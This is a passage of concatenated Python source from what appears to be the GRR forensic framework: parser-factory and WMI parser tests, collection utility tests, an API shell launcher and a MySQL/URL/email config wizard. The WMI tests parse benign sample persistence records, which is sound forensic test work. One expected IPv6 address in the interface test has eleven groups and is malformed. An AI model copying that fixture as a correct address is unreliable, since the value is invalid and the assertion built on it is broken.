self.assertCountEqual(map(type, quux_parsers), [FooParser, BazParser])
norf_factory = parsers.ArtifactParserFactory("Norf")
norf_parsers = norf_factory.SingleResponseParsers()
self.assertCountEqual(map(type, norf_parsers), [FooParser, BarParser])
thud_factory = parsers.ArtifactParserFactory("Thud")
thud_parsers = thud_factory.SingleResponseParsers()
self.assertCountEqual(map(type, thud_parsers), [BarParser, BazParser])
@mock.patch.object(parsers, "MULTI_RESPONSE_PARSER_FACTORY",
factory.Factory(parser.MultiResponseParser))
def testMultiResponseParsers(self):
class FooParser(parser.MultiResponseParser):
supported_artifacts = ["Foo"]
def ParseResponses(self, knowledge_base, responses):
raise NotImplementedError()
class BarParser(parser.MultiResponseParser):
supported_artifacts = ["Bar"]
def ParseResponses(self, knowledge_base, responses):
raise NotImplementedError()
parsers.MULTI_RESPONSE_PARSER_FACTORY.Register("Foo", FooParser)
parsers.MULTI_RESPONSE_PARSER_FACTORY.Register("Bar", BarParser)
foo_factory = parsers.ArtifactParserFactory("Foo")
foo_parsers = foo_factory.MultiResponseParsers()
self.assertCountEqual(map(type, foo_parsers), [FooParser])
bar_factory = parsers.ArtifactParserFactory("Bar")
bar_parsers = bar_factory.MultiResponseParsers()
self.assertCountEqual(map(type, bar_parsers), [BarParser])
@mock.patch.object(parsers, "SINGLE_FILE_PARSER_FACTORY",
factory.Factory(parser.SingleFileParser))
def testSingleFileParsers(self):
class FooParser(parser.SingleFileParser):
supported_artifacts = ["Bar"]
def ParseFile(self, knowledge_base, pathspec, filedesc):
raise NotImplementedError()
parsers.SINGLE_FILE_PARSER_FACTORY.Register("Foo", FooParser)
bar_factory = parsers.ArtifactParserFactory("Bar")
bar_parsers = bar_factory.SingleFileParsers()
self.assertCountEqual(map(type, bar_parsers), [FooParser])
baz_factory = parsers.ArtifactParserFactory("Baz")
baz_parsers = baz_factory.SingleFileParsers()
self.assertCountEqual(map(type, baz_parsers), [])
@mock.patch.object(parsers, "MULTI_FILE_PARSER_FACTORY",
factory.Factory(parser.MultiFileParser))
def testMultiFileParsers(self):
class FooParser(parser.MultiFileParser):
supported_artifacts = ["Quux", "Norf"]
def ParseFiles(self, knowledge_base, pathspecs, filedescs):
raise NotImplementedError()
class BarParser(parser.MultiFileParser):
supported_artifacts = ["Quux", "Thud"]
def ParseFiles(self, knowledge_base, pathspecs, filedescs):
raise NotImplementedError()
parsers.MULTI_FILE_PARSER_FACTORY.Register("Foo", FooParser)
parsers.MULTI_FILE_PARSER_FACTORY.Register("Bar", BarParser)
quux_factory = parsers.ArtifactParserFactory("Quux")
quux_parsers = quux_factory.MultiFileParsers()
self.assertCountEqual(map(type, quux_parsers), [FooParser, BarParser])
norf_factory = parsers.ArtifactParserFactory("Norf")
norf_parsers = norf_factory.MultiFileParsers()
self.assertCountEqual(map(type, norf_parsers), [FooParser])
thud_factory = parsers.ArtifactParserFactory("Thud")
thud_parsers = thud_factory.MultiFileParsers()
self.assertCountEqual(map(type, thud_parsers), [BarParser])
if __name__ == "__main__":
flags.StartMain(test_lib.main)
```
#### File: lib/parsers/wmi_parser_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import platform
import unittest
from future.utils import iteritems
from grr_response_core.lib import flags
from grr_response_core.lib.parsers import wmi_parser
from grr_response_core.lib.rdfvalues import anomaly as rdf_anomaly
from grr_response_core.lib.rdfvalues import client_network as rdf_client_network
from grr_response_core.lib.rdfvalues import protodict as rdf_protodict
from grr_response_core.lib.rdfvalues import wmi as rdf_wmi
from grr.test_lib import client_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib
class WMIParserTest(flow_test_lib.FlowTestsBaseclass):
@unittest.skipIf(
platform.system() == "Darwin",
("IPv6 address strings are cosmetically slightly different on OS X, "
"and we only expect this parsing code to run on Linux or maybe Windows"))
def testInterfaceParsing(self):
parser = wmi_parser.WMIInterfacesParser()
rdf_dict = rdf_protodict.Dict()
mock_config = client_test_lib.WMIWin32NetworkAdapterConfigurationMock
wmi_properties = iteritems(mock_config.__dict__)
for key, value in wmi_properties:
if not key.startswith("__"):
try:
rdf_dict[key] = value
except TypeError:
rdf_dict[key] = "Failed to encode: %s" % value
result_list = list(parser.Parse(rdf_dict))
self.assertLen(result_list, 2)
for result in result_list:
if isinstance(result, rdf_client_network.Interface):
self.assertLen(result.addresses, 4)
self.assertCountEqual(
[x.human_readable_address for x in result.addresses], [
"192.168.1.20", "fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:aaaa:1111:aaaa",
"fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b",
"dddd:0:8888:6666:bbbb:aaaa:ffff:bbbb"
])
self.assertCountEqual(
[x.human_readable_address for x in result.dhcp_server_list],
["192.168.1.1"])
self.assertEqual(result.dhcp_lease_expires.AsMicrosecondsSinceEpoch(),
1409008979123456)
self.assertEqual(result.dhcp_lease_obtained.AsMicrosecondsSinceEpoch(),
1408994579123456)
elif isinstance(result, rdf_client_network.DNSClientConfiguration):
self.assertCountEqual(
result.dns_server,
["192.168.1.1", "192.168.255.81", "192.168.128.88"])
self.assertCountEqual(result.dns_suffix, [
"blah.example.com", "ad.example.com", "internal.example.com",
"example.com"
])
def testWMIActiveScriptEventConsumerParser(self):
parser = wmi_parser.WMIActiveScriptEventConsumerParser()
rdf_dict = rdf_protodict.Dict()
rdf_dict["CreatorSID"] = [
1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 152, 18, 57, 8, 206, 29, 80, 44,
70, 38, 82, 8, 244, 1, 0, 0
]
rdf_dict["KillTimeout"] = 0
rdf_dict["MachineName"] = None
rdf_dict["MaximumQueueSize"] = None
rdf_dict["Name"] = "SomeName"
rdf_dict["ScriptFilename"] = None
rdf_dict["ScriptingEngine"] = "VBScript"
rdf_dict["ScriptText"] = r"""Dim objFS, objFile
Set objFS = CreateObject("Scripting.FileSystemObject")
Set objFile = objFS.OpenTextFile("C:\temp.log", 8, true)
objFile.WriteLine "Time: " & Now & "; Entry made by: ASEC"
objFile.WriteLine "Application closed. UserModeTime: " &
TargetEvent.TargetInstance.UserModeTime &_ "; KernelModeTime: " &
TargetEvent.TargetInstance.KernelModeTime & " [hundreds of nanoseconds]"
objFile.Close"""
result_list = list(parser.Parse(rdf_dict))
self.assertLen(result_list, 1)
result = result_list[0]
self.assertEqual(result.CreatorSID,
"S-1-5-21-137958040-743448014-139601478-500")
self.assertEqual(result.MaximumQueueSize, 0)
self.assertFalse(result.ScriptFilename)
def testWMIEventConsumerParserDoesntFailOnMalformedSIDs(self):
parser = wmi_parser.WMIActiveScriptEventConsumerParser()
rdf_dict = rdf_protodict.Dict()
tests = [[1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0], [1, 2, 3], [1], {1: 2}, (1, 2)]
for test in tests:
rdf_dict["CreatorSID"] = test
result_list = list(parser.Parse(rdf_dict))
self.assertLen(result_list, 1)
def testWMIEventConsumerParserDoesntFailOnUnknownField(self):
parser = wmi_parser.WMIActiveScriptEventConsumerParser()
rdf_dict = rdf_protodict.Dict()
rdf_dict["NonexistentField"] = "Abcdef"
rdf_dict["Name"] = "Test event consumer"
results = list(parser.Parse(rdf_dict))
self.assertLen(results, 2)
# Anomalies yield first
self.assertEqual(results[0].__class__, rdf_anomaly.Anomaly)
self.assertEqual(results[1].__class__, rdf_wmi.WMIActiveScriptEventConsumer)
def testWMIEventConsumerParser_EmptyConsumersYieldBlank(self):
parser = wmi_parser.WMIActiveScriptEventConsumerParser()
rdf_dict = rdf_protodict.Dict()
result_list = list(parser.Parse(rdf_dict))
self.assertLen(result_list, 1)
self.assertEqual(True, not result_list[0])
def testWMIEventConsumerParserRaisesWhenNonEmptyDictReturnedEmpty(self):
parser = wmi_parser.WMIActiveScriptEventConsumerParser()
rdf_dict = rdf_protodict.Dict()
rdf_dict["NonexistentField"] = "Abcdef"
with self.assertRaises(ValueError):
for output in parser.Parse(rdf_dict):
self.assertEqual(output.__class__, rdf_anomaly.Anomaly)
def testWMICommandLineEventConsumerParser(self):
parser = wmi_parser.WMICommandLineEventConsumerParser()
rdf_dict = rdf_protodict.Dict()
rdf_dict["CommandLineTemplate"] = "cscript KernCap.vbs"
rdf_dict["CreateNewConsole"] = False
rdf_dict["CreateNewProcessGroup"] = False
rdf_dict["CreateSeparateWowVdm"] = False
rdf_dict["CreateSharedWowVdm"] = False
rdf_dict["CreatorSID"] = [
1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 133, 116, 119, 185, 124, 13, 122,
150, 111, 189, 41, 154, 244, 1, 0, 0
]
rdf_dict["DesktopName"] = None
rdf_dict["ExecutablePath"] = None
rdf_dict["FillAttribute"] = None
rdf_dict["ForceOffFeedback"] = False
rdf_dict["ForceOnFeedback"] = False
rdf_dict["KillTimeout"] = 0
rdf_dict["MachineName"] = None
rdf_dict["MaximumQueueSize"] = None
rdf_dict["Name"] = "BVTConsumer"
rdf_dict["Priority"] = 32
rdf_dict["RunInteractively"] = False
rdf_dict["ShowWindowCommand"] = None
rdf_dict["UseDefaultErrorMode"] = False
rdf_dict["WindowTitle"] = None
rdf_dict["WorkingDirectory"] = "C:\\tools\\kernrate"
rdf_dict["XCoordinate"] = None
rdf_dict["XNumCharacters"] = None
rdf_dict["XSize"] = None
rdf_dict["YCoordinate"] = None
rdf_dict["YNumCharacters"] = None
rdf_dict["YSize"] = None
result_list = list(parser.Parse(rdf_dict))
self.assertLen(result_list, 1)
result = result_list[0]
self.assertEqual(result.CreatorSID,
"S-1-5-21-3111613573-2524581244-2586426735-500")
self.assertEqual(result.CommandLineTemplate, "cscript KernCap.vbs")
self.assertEqual(result.Name, "BVTConsumer")
self.assertEqual(result.KillTimeout, 0)
self.assertEqual(result.FillAttribute, 0)
self.assertEqual(result.FillAttributes, 0)
self.assertFalse(result.ForceOffFeedback)
self.assertFalse(result.ForceOnFeedback)
class BinarySIDToStringSIDTest(test_lib.GRRBaseTest):
def assertConvertsTo(self, sid, expected_output):
self.assertEqual(wmi_parser.BinarySIDtoStringSID(sid), expected_output)
def testEmpty(self):
self.assertConvertsTo(b"", u"")
def testSimple(self):
self.assertConvertsTo(b"\x01", u"S-1")
self.assertConvertsTo(b"\x01\x05\x00\x00\x00\x00\x00\x05", u"S-1-5")
self.assertConvertsTo(b"\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00",
u"S-1-5-21")
def testTruncated(self):
with self.assertRaises(ValueError):
wmi_parser.BinarySIDtoStringSID(
b"\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00")
with self.assertRaises(ValueError):
wmi_parser.BinarySIDtoStringSID(
b"\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00")
def test5Subauthorities(self):
self.assertConvertsTo(
b"\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\x85\x74\x77\xb9\x7c"
b"\x0d\x7a\x96\x6f\xbd\x29\x9a\xf4\x01\x00\x00",
u"S-1-5-21-3111613573-2524581244-2586426735-500")
def testLastAuthorityTruncated(self):
with self.assertRaises(ValueError):
wmi_parser.BinarySIDtoStringSID(
b"\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\x85\x74\x77\xb9"
b"\x7c\x0d\x7a\x96\x6f\xbd\x29\x9a\xf4")
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: lib/util/collection_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl.testing import absltest
from future.builtins import range
from grr_response_core.lib.util import collection
class TrimTest(absltest.TestCase):
def testEmpty(self):
lst = []
clipping = collection.Trim(lst, limit=3)
self.assertEqual(lst, [])
self.assertEqual(clipping, [])
def testSomeClipping(self):
lst = [1, 2, 3, 4, 5, 6, 7]
clipping = collection.Trim(lst, limit=4)
self.assertEqual(lst, [1, 2, 3, 4])
self.assertEqual(clipping, [5, 6, 7])
def testNoClipping(self):
lst = [1, 2, 3, 4]
clipping = collection.Trim(lst, limit=10)
self.assertEqual(lst, [1, 2, 3, 4])
self.assertEqual(clipping, [])
def testLimit0(self):
lst = [1, 2, 3]
clipping = collection.Trim(lst, limit=0)
self.assertEqual(lst, [])
self.assertEqual(clipping, [1, 2, 3])
def testLimitNegative(self):
lst = [1, 2, 3]
clipping = collection.Trim(lst, limit=-3)
self.assertEqual(lst, [])
self.assertEqual(clipping, [1, 2, 3])
class GroupTest(absltest.TestCase):
def testEmpty(self):
result = collection.Group([], key=lambda _: None)
expected = {}
self.assertEqual(result, expected)
def testByIdentity(self):
result = collection.Group([3, 2, 1, 1, 5, 3, 1, 5], key=lambda num: num)
expected = {1: [1, 1, 1], 2: [2], 3: [3, 3], 5: [5, 5]}
self.assertEqual(result, expected)
def testByFirstLetter(self):
result = collection.Group(["foo", "bar", "baz"], key=lambda text: text[0])
expected = {"f": ["foo"], "b": ["bar", "baz"]}
self.assertEqual(result, expected)
def testGenerator(self):
def Generate():
yield 4
yield 8
yield 15
yield 16
yield 23
yield 42
result = collection.Group(Generate(), key=lambda num: num % 2)
expected = {0: [4, 8, 16, 42], 1: [15, 23]}
self.assertEqual(result, expected)
class BatchTest(absltest.TestCase):
def testEmpty(self):
batches = list(collection.Batch([], 10))
self.assertEqual(batches, [])
def testUneven(self):
batches = list(collection.Batch(range(10), size=4))
self.assertEqual(batches, [[0, 1, 2, 3], [4, 5, 6, 7], [8, 9]])
def testSmallSize(self):
batches = list(collection.Batch([None] * 100, size=1))
self.assertEqual(batches, [[None]] * 100)
def testBigSize(self):
batches = list(collection.Batch([None] * 20, size=100))
self.assertEqual(batches, [[None] * 20])
class StartsWithTest(absltest.TestCase):
def testEmptyStartsWithEmpty(self):
self.assertTrue(collection.StartsWith([], []))
def testNonEmptyStartsWithEmpty(self):
self.assertTrue(collection.StartsWith([1, 2, 3], []))
def testEmptyDoesNotStartWithNonEmpty(self):
self.assertFalse(collection.StartsWith([], [1, 2, 3]))
def testEqual(self):
self.assertTrue(collection.StartsWith([1, 2, 3], [1, 2, 3]))
def testProperPrefix(self):
self.assertTrue(collection.StartsWith([1, 2, 3], [1, 2]))
self.assertTrue(collection.StartsWith([1, 2, 3], [1]))
def testDifferentElement(self):
self.assertFalse(collection.StartsWith([1, 2, 3], [1, 4, 5]))
def testStringList(self):
self.assertTrue(collection.StartsWith(["a", "b", "c"], ["a", "b"]))
def testString(self):
self.assertTrue(collection.StartsWith("foobar", "foo"))
def testNonListIterable(self):
self.assertTrue(collection.StartsWith((5, 4, 3), (5, 4)))
if __name__ == "__main__":
absltest.main()
```
#### File: grr_response_server/bin/api_shell_raw_access.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
# pylint: disable=unused-import,g-bad-import-order
from grr_response_server import server_plugins
# pylint: enable=g-bad-import-order
from grr_api_client import api
from grr_api_client import api_shell_lib
from grr_response_core import config
from grr_response_core.config import contexts
from grr_response_core.config import server as config_server
from grr_response_core.lib import flags
from grr_response_server import access_control
from grr_response_server import fleetspeak_connector
from grr_response_server import server_startup
from grr_response_server.bin import api_shell_raw_access_lib
flags.DEFINE_integer(
"page_size", 1000,
"Page size used when paging through collections of items. Default is 1000.")
flags.DEFINE_string(
"username", None, "Username to use when making raw API calls. If not "
"specified, USER environment variable value will be used.")
flags.DEFINE_string(
"exec_code", None,
"If present, no IPython shell is started but the code given in "
"the flag is run instead (comparable to the -c option of "
"IPython). The code will be able to use a predefined "
"global 'grrapi' object.")
flags.DEFINE_string(
"exec_file", None,
"If present, no IPython shell is started but the code given in "
"command file is supplied as input instead. The code "
"will be able to use a predefined global 'grrapi' "
"object.")
def main(argv=None):
del argv # Unused.
if flags.FLAGS.version:
print("GRR API shell {}".format(config_server.VERSION["packageversion"]))
return
config.CONFIG.AddContext(contexts.COMMAND_LINE_CONTEXT)
config.CONFIG.AddContext(contexts.CONSOLE_CONTEXT,
"Context applied when running the console binary.")
server_startup.Init()
fleetspeak_connector.Init()
username = flags.FLAGS.username
if not username:
username = os.environ["USER"]
if not username:
print("Username has to be specified with either --username flag or "
"USER environment variable.")
sys.exit(1)
grrapi = api.GrrApi(
connector=api_shell_raw_access_lib.RawConnector(
token=access_control.ACLToken(username=username),
page_size=flags.FLAGS.page_size))
if flags.FLAGS.exec_code and flags.FLAGS.exec_file:
print("--exec_code --exec_file flags can't be supplied together.")
sys.exit(1)
elif flags.FLAGS.exec_code:
# pylint: disable=exec-used
exec (flags.FLAGS.exec_code, dict(grrapi=grrapi))
# pylint: enable=exec-used
elif flags.FLAGS.exec_file:
api_shell_lib.ExecFile(flags.FLAGS.exec_file, grrapi)
else:
api_shell_lib.IPShell([sys.argv[0]], user_ns=dict(grrapi=grrapi))
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: grr_response_server/bin/config_updater_util.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import getpass
import os
import re
import socket
import subprocess
import sys
import time
# Usually we import concrete items from the builtins module. However, here we
# use `builtins.input` which is stubbed in the test, so we have to always use
# qualified version.
from future import builtins
from future.moves.urllib import parse as urlparse
from future.utils import iteritems
import MySQLdb
from MySQLdb.constants import CR as mysql_conn_errors
from MySQLdb.constants import ER as general_mysql_errors
import pkg_resources
from typing import Optional, Text
# pylint: disable=unused-import,g-bad-import-order
from grr_response_server import server_plugins
# pylint: enable=g-bad-import-order,unused-import
from grr_api_client import api
from grr_api_client import errors as api_errors
from grr_response_core import config as grr_config
from grr_response_core.lib import repacking
from grr_response_server import access_control
from grr_response_server import maintenance_utils
from grr_response_server import server_startup
from grr_response_server import signed_binary_utils
from grr_response_server.bin import api_shell_raw_access_lib
from grr_response_server.bin import config_updater_keys_util
from grr_response_server.gui.api_plugins import user as api_user
from grr_response_server.rdfvalues import objects as rdf_objects
try:
# Importing readline enables the raw_input calls to have history etc.
import readline # pylint: disable=unused-import,g-bad-import-order,g-import-not-at-top
except ImportError:
# readline is not bundled with Python on Windows. Simply ignoring failing
# import then.
pass
# These control retry behavior when checking that GRR can connect to
# MySQL during config initialization.
_MYSQL_MAX_RETRIES = 2
_MYSQL_RETRY_WAIT_SECS = 2
# Python hacks or executables larger than this limit will not be uploaded.
_MAX_SIGNED_BINARY_BYTES = 30 << 20 # 30 MiB
# Batch size to use when fetching multiple items from the GRR API.
_GRR_API_PAGE_SIZE = 1000
class ConfigInitError(Exception):
"""Exception raised to abort config initialization."""
def __init__(self):
super(ConfigInitError, self).__init__(
"Aborting config initialization. Please run 'grr_config_updater "
"initialize' to retry initialization.")
class BinaryTooLargeError(Exception):
"""Exception raised when trying to upload overly large binaries."""
class UserAlreadyExistsError(Exception):
"""Exception raised when trying to create an already-existing user."""
class UserNotFoundError(Exception):
"""Exception raised when trying to fetch a non-existent user."""
def __init__(self, username):
super(UserNotFoundError,
self).__init__("User '%s' does not exist." % username)
def ImportConfig(filename, config):
"""Reads an old config file and imports keys and user accounts."""
sections_to_import = ["PrivateKeys"]
entries_to_import = [
"Client.executable_signing_public_key", "CA.certificate",
"Frontend.certificate"
]
options_imported = 0
old_config = grr_config.CONFIG.MakeNewConfig()
old_config.Initialize(filename)
for entry in old_config.raw_data:
try:
section = entry.split(".")[0]
if section in sections_to_import or entry in entries_to_import:
config.Set(entry, old_config.Get(entry))
print("Imported %s." % entry)
options_imported += 1
except Exception as e: # pylint: disable=broad-except
print("Exception during import of %s: %s" % (entry, e))
return options_imported
def RetryQuestion(question_text, output_re="", default_val=None):
"""Continually ask a question until the output_re is matched."""
while True:
if default_val is not None:
new_text = "%s [%s]: " % (question_text, default_val)
else:
new_text = "%s: " % question_text
# pytype: disable=wrong-arg-count
output = builtins.input(new_text) or str(default_val)
# pytype: enable=wrong-arg-count
output = output.strip()
if not output_re or re.match(output_re, output):
break
else:
print("Invalid input, must match %s" % output_re)
return output
def RetryBoolQuestion(question_text, default_bool):
if not isinstance(default_bool, bool):
raise ValueError(
"default_bool should be a boolean, not %s" % type(default_bool))
default_val = "Y" if default_bool else "N"
prompt_suff = "[Yn]" if default_bool else "[yN]"
return RetryQuestion("%s %s: " % (question_text, prompt_suff), "[yY]|[nN]",
default_val)[0].upper() == "Y"
def ConfigureHostnames(config, external_hostname = None):
"""This configures the hostnames stored in the config."""
if not external_hostname:
try:
external_hostname = socket.gethostname()
except (OSError, IOError):
print("Sorry, we couldn't guess your hostname.\n")
external_hostname = RetryQuestion(
"Please enter your hostname e.g. "
"grr.example.com", "^[\\.A-Za-z0-9-]+$", external_hostname)
print("""\n\n-=Server URL=-
The Server URL specifies the URL that the clients will connect to
communicate with the server. For best results this should be publicly
accessible. By default this will be port 8080 with the URL ending in /control.
""")
frontend_url = RetryQuestion("Frontend URL", "^http://.*/$",
"http://%s:8080/" % external_hostname)
config.Set("Client.server_urls", [frontend_url])
frontend_port = urlparse.urlparse(frontend_url).port or grr_config.CONFIG.Get(
"Frontend.bind_port")
config.Set("Frontend.bind_port", frontend_port)
print("""\n\n-=AdminUI URL=-:
The UI URL specifies where the Administrative Web Interface can be found.
""")
ui_url = RetryQuestion("AdminUI URL", "^http[s]*://.*$",
"http://%s:8000" % external_hostname)
config.Set("AdminUI.url", ui_url)
ui_port = urlparse.urlparse(ui_url).port or grr_config.CONFIG.Get(
"AdminUI.port")
config.Set("AdminUI.port", ui_port)
def CheckMySQLConnection(db_options):
"""Checks whether a connection can be established to MySQL.
Args:
db_options: A dict mapping GRR MySQL config options to their values.
Returns:
A boolean indicating whether a connection could be made to a MySQL server
instance with the given options.
"""
for tries_left in range(_MYSQL_MAX_RETRIES, -1, -1):
try:
connection_options = dict(
host=db_options["Mysql.host"],
port=db_options["Mysql.port"],
db=db_options["Mysql.database_name"],
user=db_options["Mysql.database_username"],
passwd=db_options["Mysql.database_password"],
charset="utf8")
ssl_enabled = "Mysql.client_key_path" in db_options
if ssl_enabled:
connection_options["ssl"] = {
"key": db_options["Mysql.client_key_path"],
"cert": db_options["Mysql.client_cert_path"],
"ca": db_options["Mysql.ca_cert_path"],
}
connection = MySQLdb.connect(**connection_options)
if ssl_enabled:
cursor = connection.cursor()
cursor.execute("SHOW VARIABLES LIKE 'have_ssl'")
res = cursor.fetchone()
if res[0] == "have_ssl" and res[1] == "YES":
print("SSL enabled successfully.")
else:
print("Unable to establish SSL connection to MySQL.")
return False
return True
except MySQLdb.OperationalError as mysql_op_error:
if len(mysql_op_error.args) < 2:
# We expect the exception's arguments to be an error-code and
# an error message.
print("Unexpected exception type received from MySQL. %d attempts "
"left: %s" % (tries_left, mysql_op_error))
time.sleep(_MYSQL_RETRY_WAIT_SECS)
continue
if mysql_op_error.args[0] == mysql_conn_errors.CONNECTION_ERROR:
print("Failed to connect to MySQL. Is it running? %d attempts left." %
tries_left)
elif mysql_op_error.args[0] == mysql_conn_errors.UNKNOWN_HOST:
print("Unknown-hostname error encountered while trying to connect to "
"MySQL.")
return False # No need for retry.
elif mysql_op_error.args[0] == general_mysql_errors.BAD_DB_ERROR:
# GRR db doesn't exist yet. That's expected if this is the initial
# setup.
return True
elif mysql_op_error.args[0] in (
general_mysql_errors.ACCESS_DENIED_ERROR,
general_mysql_errors.DBACCESS_DENIED_ERROR):
print("Permission error encountered while trying to connect to "
"MySQL: %s" % mysql_op_error)
return False # No need for retry.
else:
print("Unexpected operational error encountered while trying to "
"connect to MySQL. %d attempts left: %s" % (tries_left,
mysql_op_error))
except MySQLdb.Error as mysql_error:
print("Unexpected error encountered while trying to connect to MySQL. "
"%d attempts left: %s" % (tries_left, mysql_error))
time.sleep(_MYSQL_RETRY_WAIT_SECS)
return False
def ConfigureMySQLDatastore(config):
"""Prompts the user for configuration details for a MySQL datastore."""
print("GRR will use MySQL as its database backend. Enter connection details:")
datastore_init_complete = False
db_options = {}
while not datastore_init_complete:
db_options["Datastore.implementation"] = "MySQLAdvancedDataStore"
db_options["Mysql.host"] = RetryQuestion("MySQL Host", "^[\\.A-Za-z0-9-]+$",
config["Mysql.host"])
db_options["Mysql.port"] = int(
RetryQuestion("MySQL Port (0 for local socket)", "^[0-9]+$",
config["Mysql.port"]))
db_options["Mysql.database_name"] = RetryQuestion(
"MySQL Database", "^[A-Za-z0-9-]+$", config["Mysql.database_name"])
db_options["Mysql.database_username"] = RetryQuestion(
"MySQL Username", "[A-Za-z0-9-@]+$", config["Mysql.database_username"])
# TODO(hanuszczak): Incorrect type specification for `getpass`.
# pytype: disable=wrong-arg-types
db_options["Mysql.database_password"] = getpass.getpass(
prompt="Please enter password for database user %s: " %
db_options["Mysql.database_username"])
# pytype: enable=wrong-arg-types
use_ssl = RetryBoolQuestion("Configure SSL connections for MySQL?", False)
if use_ssl:
db_options["Mysql.client_key_path"] = RetryQuestion(
"Path to the client private key file",
default_val=config["Mysql.client_key_path"])
db_options["Mysql.client_cert_path"] = RetryQuestion(
"Path to the client certificate file",
default_val=config["Mysql.client_cert_path"])
db_options["Mysql.ca_cert_path"] = RetryQuestion(
"Path to the CA certificate file",
default_val=config["Mysql.ca_cert_path"])
if CheckMySQLConnection(db_options):
print("Successfully connected to MySQL with the provided details.")
datastore_init_complete = True
else:
print("Error: Could not connect to MySQL with the provided details.")
should_retry = RetryBoolQuestion(
"Re-enter MySQL details? Answering 'no' will abort config "
"initialization: ", True)
if should_retry:
db_options.clear()
else:
raise ConfigInitError()
for option, value in iteritems(db_options):
config.Set(option, value)
def ConfigureDatastore(config):
"""Guides the user through configuration of the datastore."""
print("\n\n-=GRR Datastore=-\n"
"For GRR to work each GRR server has to be able to communicate with\n"
"the datastore. To do this we need to configure a datastore.\n")
existing_datastore = grr_config.CONFIG.Get("Datastore.implementation")
if not existing_datastore or existing_datastore == "FakeDataStore":
ConfigureMySQLDatastore(config)
return
print("Found existing settings:\n Datastore: %s" % existing_datastore)
if existing_datastore == "SqliteDataStore":
set_up_mysql = RetryBoolQuestion(
"The SQLite datastore is no longer supported. Would you like to\n"
"set up a MySQL datastore? Answering 'no' will abort config "
"initialization.", True)
if set_up_mysql:
print("\nPlease note that no data will be migrated from SQLite to "
"MySQL.\n")
ConfigureMySQLDatastore(config)
else:
raise ConfigInitError()
elif existing_datastore == "MySQLAdvancedDataStore":
print(" MySQL Host: %s\n MySQL Port: %s\n MySQL Database: %s\n"
" MySQL Username: %s\n" %
(grr_config.CONFIG.Get("Mysql.host"),
grr_config.CONFIG.Get("Mysql.port"),
grr_config.CONFIG.Get("Mysql.database_name"),
grr_config.CONFIG.Get("Mysql.database_username")))
if grr_config.CONFIG.Get("Mysql.client_key_path"):
print(" MySQL client key file: %s\n"
" MySQL client cert file: %s\n"
" MySQL ca cert file: %s\n" %
(grr_config.CONFIG.Get("Mysql.client_key_path"),
grr_config.CONFIG.Get("Mysql.client_cert_path"),
grr_config.CONFIG.Get("Mysql.ca_cert_path")))
if not RetryBoolQuestion("Do you want to keep this configuration?", True):
ConfigureMySQLDatastore(config)
def ConfigureUrls(config, external_hostname = None):
"""Guides the user through configuration of various URLs used by GRR."""
print("\n\n-=GRR URLs=-\n"
"For GRR to work each client has to be able to communicate with the\n"
"server. To do this we normally need a public dns name or IP address\n"
"to communicate with. In the standard configuration this will be used\n"
"to host both the client facing server and the admin user interface.\n")
existing_ui_urn = grr_config.CONFIG.Get("AdminUI.url", default=None)
existing_frontend_urns = grr_config.CONFIG.Get("Client.server_urls")
if not existing_frontend_urns:
# Port from older deprecated setting Client.control_urls.
existing_control_urns = grr_config.CONFIG.Get(
"Client.control_urls", default=None)
if existing_control_urns is not None:
existing_frontend_urns = []
for existing_control_urn in existing_control_urns:
if not existing_control_urn.endswith("control"):
raise RuntimeError(
"Invalid existing control URL: %s" % existing_control_urn)
existing_frontend_urns.append(
existing_control_urn.rsplit("/", 1)[0] + "/")
config.Set("Client.server_urls", existing_frontend_urns)
config.Set("Client.control_urls", ["deprecated use Client.server_urls"])
if not existing_frontend_urns or not existing_ui_urn:
ConfigureHostnames(config, external_hostname=external_hostname)
else:
print("Found existing settings:\n AdminUI URL: %s\n "
"Frontend URL(s): %s\n" % (existing_ui_urn, existing_frontend_urns))
if not RetryBoolQuestion("Do you want to keep this configuration?", True):
ConfigureHostnames(config, external_hostname=external_hostname)
def ConfigureEmails(config):
"""Guides the user through email setup."""
print("\n\n-=GRR Emails=-\n"
"GRR needs to be able to send emails for various logging and\n"
"alerting functions. The email domain will be appended to GRR\n"
"usernames when sending emails to users.\n")
existing_log_domain = grr_config.CONFIG.Get("Logging.domain", default=None)
existing_al_email = grr_config.CONFIG.Get(
"Monitoring.alert_email", default=None)
existing_em_email = grr_config.CONFIG.Get(
"Monitoring.emergency_access_email", default=None)
if existing_log_domain and existing_al_email and existing_em_email:
print("Found existing settings:\n"
" Email Domain: %s\n Alert Email Address: %s\n"
" Emergency Access Email Address: %s\n" %
(existing_log_domain, existing_al_email, existing_em_email))
if RetryBoolQuestion("Do you want to keep this configuration?", True):
return
print("\n\n-=Monitoring/Email Domain=-\n"
"Emails concerning alerts or updates must be sent to this domain.\n")
domain = RetryQuestion("Email Domain e.g example.com",
"^([\\.A-Za-z0-9-]+)*$",
grr_config.CONFIG.Get("Logging.domain"))
config.Set("Logging.domain", domain)
print("\n\n-=Alert Email Address=-\n"
"Address where monitoring events get sent, e.g. crashed clients, \n"
"broken server, etc.\n")
email = RetryQuestion("Alert Email Address", "", "grr-monitoring@%s" % domain)
config.Set("Monitoring.alert_email", email)
print("\n\n-=Emergency Email Address=-\n"
"Address where high priority events such as an emergency ACL bypass "
"are sent.\n")
emergency_email = RetryQuestion("Emergency Access Email Address", "",
"grr-emergency@%s" % domain)
config.Set("Monitoring.emergency_access_email", emergency_email)
def InstallTemplatePackage():
"""Call pip to install the templates."""
virtualenv_bin = os.path.dirname(sys.executable)
